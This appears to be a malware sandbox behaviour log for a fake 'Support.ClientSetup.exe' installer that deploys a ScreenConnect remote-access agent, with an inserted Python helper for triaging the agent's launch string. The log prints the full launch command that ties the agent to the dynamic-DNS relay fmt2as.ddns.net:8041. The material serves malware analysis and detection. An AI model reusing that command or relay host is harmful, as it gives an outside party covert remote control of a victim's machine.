Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal50.troj.evad.winEXE@26/58@1/2
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: Support.ClientSetup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Support.ClientSetup.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: Support.ClientSetup.exe | ReversingLabs: Detection: 22%
Source: Support.ClientSetup.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: Support.ClientSetup.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | File read: C:\Users\user\Desktop\Support.ClientSetup.exe
Source: unknown | Process created: C:\Users\user\Desktop\Support.ClientSetup.exe "C:\Users\user\Desktop\Support.ClientSetup.exe"
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 C
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
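The ScreenConnect.ClientService.exe launch entry above carries the entire client configuration in one query string: the relay host and port, the session identifier, and a base64 blob in `k`. The Python below is an added triage helper, not code from Joe Sandbox or ConnectWise. It parses the launch string copied verbatim from that process-creation entry, flags a relay host on a dynamic-DNS provider, and decodes `k` as a Microsoft CAPI PUBLICKEYBLOB (BLOBHEADER, then RSAPUBKEY, then the little-endian modulus). The parameter meanings (e session type, y role, h relay host, p port, s session id, k server public key, c custom properties) are my reading of the ScreenConnect client argument format, and the dynamic-DNS suffix list is an illustrative assumption.

```python
"""Triage a ScreenConnect client launch string (added example, not
Joe Sandbox or ConnectWise code). Launch string copied from the report;
parameter meanings and the dynamic-DNS list are assumptions."""
import base64
import hashlib
import struct
from urllib.parse import parse_qs

# Copied from the report's ScreenConnect.ClientService.exe entry.
SAMPLE_ARGS = (
    "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041"
    "&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40"
    "&k=BgIAAACkAABSU0ExAAgAAAEAAQBx"
    "zLpqh5koCP8CJbkkTCK5cqKcoz1K"
    "1JPBKGOoX2UntNEa0kbsjdHiHm6a"
    "wC3b94Odgxip4bb3WZtV%2bJZdrE"
    "VSNJWv79YSvcWZT5y1UoPQ5ERCoZ"
    "iQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1r"
    "scnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4"
    "LXHocknsHhcSdO6lbQtdrPsiR%2fwv9"
    "GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMc"
    "HkEa3AHKqY3OM2oXN5%2bJcDFS6u9Vis"
    "BMF5vwQJoGDG1GYkn2BCkN6fQQkj8Qo"
    "Ha84KuId00fcEP90jRiW7auJprFFF09v"
    "lWeqobl%2bXErI6rnKx3nZ"
    "&c=Online&c=Online&c=Online&c=&c=&c=&c=&c="
)

# Assumption: short illustrative list; extend it from your own intel.
DYNDNS_SUFFIXES = ("ddns.net", "no-ip.com", "no-ip.org", "duckdns.org",
                   "hopto.org", "zapto.org", "dynu.net")

PUBLICKEYBLOB = 0x06        # CAPI BLOBHEADER.bType for a public key
CALG_RSA_KEYX = 0x0000A400  # CAPI BLOBHEADER.aiKeyAlg for RSA key exchange


def parse_client_args(args: str) -> dict:
    """Split the launch string. Assumed meanings: e=session type, y=role,
    h=relay host, p=port, s=session id, k=server public key, c=custom
    properties (repeats, so it stays a list). parse_qs also undoes the
    %2b/%2f escapes inside the key blob."""
    qs = args.strip().strip('"').lstrip("?")
    raw = parse_qs(qs, keep_blank_values=True)
    params = {k: v[0] for k, v in raw.items() if k != "c"}
    params["c"] = raw.get("c", [])
    return params


def parse_capi_rsa_pubkey(k_param: str) -> dict:
    """Decode a CAPI PUBLICKEYBLOB: 8-byte BLOBHEADER, 12-byte RSAPUBKEY
    ('RSA1', bit length, public exponent), then the LE modulus."""
    blob = base64.b64decode(k_param)
    btype, _ver, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if btype != PUBLICKEYBLOB or magic != b"RSA1":
        raise ValueError("not a CAPI RSA public key blob")
    modulus = blob[20:20 + bitlen // 8]
    if len(modulus) != bitlen // 8:
        raise ValueError("modulus truncated")
    return {
        "alg": alg, "bits": bitlen, "exponent": pubexp,
        "modulus": int.from_bytes(modulus, "little"),
        # Fingerprint of the big-endian modulus: pivots across renamed
        # installers that point at the same ScreenConnect server.
        "modulus_sha256": hashlib.sha256(modulus[::-1]).hexdigest(),
    }


def is_dyndns_host(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def triage(args: str) -> dict:
    p = parse_client_args(args)
    host = p.get("h", "")
    findings = []
    if is_dyndns_host(host):
        findings.append(f"relay host {host} is on a dynamic DNS provider")
    if p.get("e") == "Access":
        findings.append("session type Access: persistent unattended agent")
    port = int(p["p"]) if p.get("p", "").isdigit() else None
    key = parse_capi_rsa_pubkey(p["k"]) if p.get("k") else None
    return {"type": p.get("e"), "role": p.get("y"), "host": host,
            "port": port, "session": p.get("s"), "custom": p["c"],
            "key": key, "findings": findings}


if __name__ == "__main__":
    for name, value in triage(SAMPLE_ARGS).items():
        print(f"{name}: {value}")
```

On the report's string the header decodes to bType 0x06, algorithm 0xA400 (CALG_RSA_KEYX), magic RSA1, 2048 bits, exponent 65537, with a full 256-byte modulus, so the blob is complete. Assuming `k` is the server public key the client trusts, the modulus hash is a stable indicator for this ScreenConnect instance even when the relay host or installer name changes, and is worth keeping next to the host and session id.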
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: dpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: samcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: samlib.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Section loaded: winnsi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
